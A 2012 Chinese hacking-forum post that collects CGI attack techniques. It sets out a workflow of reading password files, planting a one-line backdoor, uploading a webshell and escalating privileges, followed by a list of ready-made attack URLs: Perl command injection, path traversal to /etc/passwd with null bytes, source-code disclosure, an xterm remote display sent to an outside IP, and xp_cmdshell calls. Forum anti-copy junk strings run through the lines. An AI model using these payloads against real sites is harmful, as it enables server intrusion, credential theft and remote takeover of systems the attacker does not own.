找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2726|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
! U2 g, B5 M  P3 x. dcookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  $ _9 f! P( @6 _5 g5 t9 a  [
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们    y6 @) k! U' C+ w! O1 K7 g, n
注“  
: {+ M# `6 r5 T+ Wperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
: {$ I/ Z5 F3 D* f! C以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  : v* a5 t* m1 @% G; P& j, t
0 r5 ~2 Y' j" k( O6 _2 f( D8 S
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  # K% k& M+ P! q8 @/ @
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  " [0 t1 D: B8 z% m. {) P% W3 y; x
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
8 C3 r1 m0 X  a* n: m- e& u, Bhttp://target.com/cgi-bin/home/news/sub.pl?`id`  3 E3 t9 p( z* z4 K
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  8 E0 z$ [7 |. c# f/ [- {# [
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  
$ G3 l( Q4 _( Y& `" v3 D' ?( d# d5 ^: `1 N& m% v, B
http://target.com/test.pl;ls|  3 i4 w9 \+ I& j4 r
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
) G  `) H! n8 A* g1 khttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
4 k5 z; o$ t& H, \5 n) Qhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  & h9 m, \' O7 F! F& _# M- q
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
# ?  n5 ^2 g% ]2 t- H( S& y$ v9 K( r4 Shttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  6 S( M, M! a! u. y

. t* X- E' ]2 \% D+ i" |/ d( @http://target.com/test.pl?&........ /../../etc/passwd  * N, x+ p9 ^, c
/ S, e% O, `: ~# A( l. z
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  " M6 R2 G9 [. j
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  3 X3 v! g2 W" l0 y  J; o$ t
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  " n  ^; T2 q! g% P2 B

4 _# a% }/ m; C& T. K  w# L/ V$ t9 C  I, ehttp://www.target.org/show.php?f ... /include/config.php 查看php代码  
+ n4 g2 S1 a0 P% K* Fhttp://www.target.org/show.php?f ... ng/admin/global.php  0 E3 q7 Z+ N5 ^8 p
; b  C& i# y  l% P* V
emm和ps的一句话8 L8 {8 F# m1 S; Z( I6 n+ B' z. X
4 {$ ~& u( e) g; P( f0 g! O
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  7 Y7 H2 U" I# j( ~! R8 y
: X- R6 }/ x* B( {4 ~8 S& H
>bbb%20|  
$ n' R" x: \' J- z6 T4 i
# W* m" ]" m& O& ~4 a& G. G  rhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
. S5 z* [, o; Q8 m! N: x! t/ U& t7 n4 Y! W( R
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  : L: d2 n5 T* {/ R) B2 w4 |3 w
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
6 }. z4 {( d/ c* A" \2 d
, F; v% d+ Z( R相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
( T' H5 o( E" ^, {' }http://target.com/index.html#cmd.exe  ! J5 K4 Q% n; v4 A
http://target.com/index.html?dummyparam=xp_cmdshell  
% e8 O1 N- c' Y+ l. R; L. X. i2 Mlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
% c% w6 S7 r+ |4 B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表